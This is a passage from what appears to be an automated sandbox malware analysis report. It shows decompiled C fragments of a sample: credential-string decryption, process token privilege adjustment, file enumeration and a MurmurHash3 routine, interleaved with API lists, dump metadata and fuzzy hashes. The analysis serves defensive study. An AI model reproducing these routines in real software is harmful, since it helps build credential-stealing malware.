				_v20 = 0;                                                    // 0x00439e76  out.type
				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);            // 0x00439e79  indirect call: decrypt(&in, &out, NULL)
				 *((char*)(_v12 + _v16)) = 0;                                // 0x00439e85  out.data[out.len] = '\0'
				_t39 = E00435A3C(_v12 + 1);                                  // 0x00439e8e  VirtualAlloc-backed allocator (subcall listed below)
				 *_a8 = _t39;                                                // 0x00439e9a
				return lstrcpyA(_t39, _v16);                                 // 0x00439ea6
			}

                                      APIs
                                      • lstrlenA.KERNEL32(?,?,?,00000000,?,004396F1,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 00439E21
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00439E4F
                                        • Part of subcall function 00435A3C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0043347F,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00435A46
                                      • lstrcpyA.KERNEL32(00000000,?), ref: 00439E9C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                      • String ID:
                                      • API String ID: 573875632-0
                                      • Opcode ID: 4a2ff4e092ffcca919c3839eddcbf7ff20dd5c2f78f67d01a61a7b7652569cde
                                      • Instruction ID: d54bccfed66300b1636d6b331fc626e082994f5741dbc7ad4b427f1b61bcca4a
                                      • Opcode Fuzzy Hash: 4a2ff4e092ffcca919c3839eddcbf7ff20dd5c2f78f67d01a61a7b7652569cde
                                      • Instruction Fuzzy Hash: 3A11D3B6D00209AFCB01DFA5D8848EEBBB8EF48348F5041BAF605A2210D7759A05CBA4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 60%
                                      			E0043D609(void* __ecx, WCHAR** __edx) {
                                      				void* _v8;
                                      				long _v12;
                                      				struct _LUID _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				struct _TOKEN_PRIVILEGES _v36;
                                      				struct _TOKEN_PRIVILEGES _v52;
                                      				WCHAR** _t33;
                                      
                                      				asm("stosd");
                                      				asm("xorps xmm0, xmm0");
                                      				_v8 = 0;
                                      				_t33 = __edx;
                                      				asm("movlpd [ebp-0x10], xmm0");
                                      				_v12 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
                                      					L4:
                                      					return 0;
                                      				} else {
                                      					_v36.Privileges = _v20.LowPart;
                                      					_v28 = _v20.HighPart;
                                      					_v36.PrivilegeCount = 1;
                                      					_v24 = 2;
                                      					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
                                      						goto L4;
                                      					}
                                      					return 1;
                                      				}
                                      			}


                                      APIs
                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0043C423), ref: 0043D634
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043D645
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 0043D67A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                      • String ID:
                                      • API String ID: 658607936-0
                                      • Opcode ID: 7b5fb3b2df9bd92b2a28756da2c2aef62be0c9fe6ed9cea25315b0f21c8c7c1f
                                      • Instruction ID: 48a3eb8b21a957a68760f75adc3b3683e12e1061fea862fff1f505c96a6d5cd0
                                      • Opcode Fuzzy Hash: 7b5fb3b2df9bd92b2a28756da2c2aef62be0c9fe6ed9cea25315b0f21c8c7c1f
                                      • Instruction Fuzzy Hash: F9113A75E10219AFEB10CFA5DC859EFBBBCFB08200F00052AA901F2150E6B49A058BA0
                                      Uniqueness

                                      Uniqueness Score: 7.75%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00CC528B,?,00000000,?,?), ref: 00CC52AE
                                      • TerminateProcess.KERNEL32(00000000,?,00CC528B,?,00000000,?,?), ref: 00CC52B5
                                      • ExitProcess.KERNEL32 ref: 00CC52C7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: de3c27c5bdf6c8007e191fb6fad8e8312ffc71268e376f8d8d30545d6a99bc7d
                                      • Instruction ID: cc4c3ef933adbeb5f8061c2d395f845ee3f8dc764087b20f5147cbee0f7f3cb4
                                      • Opcode Fuzzy Hash: de3c27c5bdf6c8007e191fb6fad8e8312ffc71268e376f8d8d30545d6a99bc7d
                                      • Instruction Fuzzy Hash: 41E0B631401988ABCB156B65DD9DF5D3B69FB41341B044418FA0A8A131CB75EE82EA80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: cce0fb6be484fc26152d43ed1dbb53b9d42d1c0609fa71e7a5091307eae7d460
                                      • Instruction ID: 124a0aaeb4061d7c72c13788d589c205c637dafd1e958a54f5a906b131fd1dbe
                                      • Opcode Fuzzy Hash: cce0fb6be484fc26152d43ed1dbb53b9d42d1c0609fa71e7a5091307eae7d460
                                      • Instruction Fuzzy Hash: 2331E271900208AFDB24CE68CC85FFB7BADDB85354F14019CF56997251EA30AE498B90
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction ID: c430a5b29fdd8024c5a83da701d90a82bf5986abd6bb3d80df06eba10e4f5c87
                                      • Opcode Fuzzy Hash: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction Fuzzy Hash: 3A022B71E002199BDF14CFA9C891BADB7F5FF48314F25826ED929A7344D731AE418B90
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 72%
                                      			E0043DEC5(void* __ecx, void* __eflags, WCHAR* _a4) {
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				char _v28;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _v56;
                                      				struct _WIN32_FIND_DATAW _v648;
                                      				intOrPtr _t39;
                                      				void* _t62;
                                      				void* _t75;
                                      				void* _t76;
                                      				void* _t77;
                                      				void* _t79;
                                      
                                      				_v20 = _v20 & 0x00000000;
                                      				_t39 = 5;
                                      				_t75 = __ecx;
                                      				_v16 = _t39;
                                      				_v24 = _t39;
                                      				E00431815( &_v28, __eflags);
                                      				_t62 = FindFirstFileW(_a4,  &_v648);
                                      				_t79 = _t62 - 0xffffffff;
                                      				while(_t79 != 0) {
                                      					_v56 = _v56 & 0x00000000;
                                      					__eflags = _v648.dwFileAttributes & 0x00000010;
                                      					if((_v648.dwFileAttributes & 0x00000010) == 0) {
                                      						_t16 =  &_v40;
                                      						 *_t16 = _v40 & 0x00000000;
                                      						__eflags =  *_t16;
                                      						_v48 = _v648.nFileSizeLow;
                                      						_v44 = _v648.nFileSizeHigh;
                                      					} else {
                                      						asm("xorps xmm0, xmm0");
                                      						_v40 = 1;
                                      						asm("movlpd [ebp-0x2c], xmm0");
                                      					}
                                      					E00433264( &_v56, E00433412( &_v12,  &(_v648.cFileName)));
                                      					E00435A2D(_v12);
                                      					_v12 = _v12 & 0x00000000;
                                      					_t77 = _t77 - 0x18;
                                      					_t76 = _t77;
                                      					E0043345A(_t76,  &_v56);
                                      					 *((intOrPtr*)(_t76 + 8)) = _v48;
                                      					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
                                      					 *(_t76 + 0x10) = _v40;
                                      					E00431716( &_v28);
                                      					E00435A2D(_v56);
                                      					__eflags = FindNextFileW(_t62,  &_v648);
                                      				}
                                      				E00431301(_t75, _t79,  &_v28);
                                      				_t73 = _v28;
                                      				if(_v28 != 0) {
                                      					E00431A75(_t73, _t73);
                                      				}
                                      				E00435A2D(_a4);
                                      				return _t75;
                                      			}


                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0043DEF2
                                      • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 0043DF94
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: ea1546f00fa3f42e978d29bdd0f35372d4810a64653911d34b7a6588a61760df
                                      • Instruction ID: 347fcf938d801095227b4d456bd5fd5ac79e4067785d9f1f830ca3b2ae7cad00
                                      • Opcode Fuzzy Hash: ea1546f00fa3f42e978d29bdd0f35372d4810a64653911d34b7a6588a61760df
                                      • Instruction Fuzzy Hash: DA318F71E012099BCB10EFA5D985BEEBBF8AF48315F10516AF412B3241EB789E44CF54
                                      Uniqueness

                                      Uniqueness Score: 0.95%

                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CCFA14,?,?,00000008,?,?,00CCF6A7,00000000), ref: 00CCFC46
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 0f06708e5f2c46e6fc06b9e0be8cdea21513bf37c8621635dbee3d6ab4a584dd
                                      • Instruction ID: 21de27310ea7a5530a700bf7935c4ecd5206752cc288417248adf8f6c081bbf6
                                      • Opcode Fuzzy Hash: 0f06708e5f2c46e6fc06b9e0be8cdea21513bf37c8621635dbee3d6ab4a584dd
                                      • Instruction Fuzzy Hash: 42B13B316106099FD729CF28C496F647BA1FF05364F25866DE8AACF2A1C335DE82CB40
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction ID: 1483621a92544b935aa0ecc25dc0fab90dc0635efbac6e11731e1b86ff76a2ec
                                      • Opcode Fuzzy Hash: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction Fuzzy Hash: 8151AD31A04AC557DB3895ACF896FBF63A59B16700F18C84DF9A3CB682C710DF469352
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5fa20e1dd23f576b419253c68e3d279101d3b698eeb1f6445727d31e87c677e
                                      • Instruction ID: fd195d0676d3e009b3d22141dc42b914e585b1dd44978c9e75c28d8e8ebc3466
                                      • Opcode Fuzzy Hash: f5fa20e1dd23f576b419253c68e3d279101d3b698eeb1f6445727d31e87c677e
                                      • Instruction Fuzzy Hash: 7E21A473F2053947770CC47E8C5227DB6E1C78C501745827AE8A6DA3C1D968D917E2E4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction ID: 44110b7af02148b0be507903e389a061a70ab4b9f7c3b34899126bfb2529a75b
                                      • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                      • Instruction Fuzzy Hash: 46316D75F00A26AFCB04CF58D4909AEF7F6FF89314B6981AAD801A7315D734E981CB84
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74cee130f9598eabc37072ceb195ada8e56836f9e2113ca5bf38eb8312ebf743
                                      • Instruction ID: 3e0236e5f2f35cc66b6ca336405095457327c813a9ba24eeaabfe8fd61b24461
                                      • Opcode Fuzzy Hash: 74cee130f9598eabc37072ceb195ada8e56836f9e2113ca5bf38eb8312ebf743
                                      • Instruction Fuzzy Hash: 6511A763F309395B374CC56E8C9337962D1EB9C600347523EE966D62C0E464DB23D2D4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction ID: 92e648b714a2cabb26c221812736e49a7274a1752de53181e73e1e6cc65f7c81
                                      • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                      • Instruction Fuzzy Hash: 6A31D53660434A8FC710DF18D4C0AAAB7E5FF89314F4509AEE59587312D378F9868B95
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 83%
                                      			// Editor's annotation: the right-hand address column of the report was spilled below the listing;
                                      			// each statement's instruction address is restored here as a trailing comment.
                                      			// The multiply constants 0xcc9e2d51/0x1b873593 and the 0x85ebca6b/0xc2b2ae35 finaliser are the
                                            			// MurmurHash3 (x86, 32-bit) constants, applied here with seed 0x10ad over a 4-byte-block loop plus tail.
                                      			E0043F9F3(void* __ecx, signed int __edx, signed int* _a8) {
                                      				void* _t12;
                                      				signed int* _t24;
                                      				void* _t25;
                                      				signed int _t32;
                                      				signed int _t34;
                                      				signed int _t41;
                                      				signed int _t42;
                                      				signed int _t47;
                                      				signed int _t48;
                                      				signed char* _t51;
                                      
                                      				_t32 = __edx;                                                        // 0x0043f9f7  (length)
                                      				asm("cdq");                                                          // 0x0043f9fb
                                      				_t41 = __edx & 0x00000003;                                           // 0x0043f9fc  (length mod 4)
                                      				_t42 = 0x10ad;                                                       // 0x0043fa04  (seed)
                                      				_t47 = _t41 + __edx >> 2;                                            // 0x0043fa09  (number of 4-byte blocks)
                                      				_t51 = __ecx + _t47 * 4;                                             // 0x0043fa0c
                                      				_t48 =  ~_t47;                                                       // 0x0043fa0f
                                      				if(_t41 != 0) {                                                      // 0x0043fa11
                                      					do {                                                                 // 0x0043fa13
                                      						asm("rol eax, 0xf");                                                 // 0x0043fa1a
                                      						asm("rol eax, 0xd");                                                 // 0x0043fa25
                                      						_t42 = ( *(_t51 + _t48 * 4) * 0xcc9e2d51 * 0x1b873593 ^ _t42) * 5 - 0x19ab949c; // 0x0043fa2b  (block mix)
                                      						_t48 = _t48 + 1;                                                     // 0x0043fa31
                                      					} while (_t48 != 0);                                                 // 0x0043fa31
                                      				}                                                                    // 0x0043fa13
                                      				_t34 = 0;                                                            // 0x0043fa38
                                      				_t12 = (_t32 & 0x00000003) - 1;                                      // 0x0043fa3d  (tail switch on length mod 4)
                                      				if(_t12 == 0) {                                                      // 0x0043fa40
                                      					L7:                                                                  // 0x0043fa5c
                                      					asm("rol eax, 0xf");                                                 // 0x0043fa67
                                      					_t42 = _t42 ^ ( *_t51 & 0x000000ff ^ _t34) * 0xcc9e2d51 * 0x1b873593; // 0x0043fa70
                                      				} else {                                                             // 0x0043fa42
                                      					_t25 = _t12 - 1;                                                     // 0x0043fa42
                                      					if(_t25 == 0) {                                                      // 0x0043fa45
                                      						L6:                                                                  // 0x0043fa53
                                      						_t34 = _t34 ^ (_t51[1] & 0x000000ff) << 0x00000008;                 // 0x0043fa5a
                                      						goto L7;                                                             // 0x00000000
                                      					} else {                                                             // 0x0043fa47
                                      						if(_t25 == 1) {                                                      // 0x0043fa4a
                                      							_t34 = (_t51[2] & 0x000000ff) << 0x10;                              // 0x0043fa50
                                      							goto L6;                                                             // 0x00000000
                                      						}                                                                    // 0x0043fa50
                                      					}                                                                    // 0x0043fa4a
                                      				}                                                                    // 0x0043fa45
                                      				_t24 = _a8;                                                          // 0x0043fa98
                                      				// fmix32 finaliser: h ^= len; h ^= h >> 16; h *= 0x85ebca6b; h ^= h >> 13; h *= 0xc2b2ae35; h ^= h >> 16
                                      				 *_t24 = (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010 ^ (((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b >> 0x0000000d ^ ((_t42 ^ _t32) >> 0x00000010 ^ _t42 ^ _t32) * 0x85ebca6b) * 0xc2b2ae35; // 0x0043fa9b
                                      				return _t24;                                                         // 0x0043fa9e
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
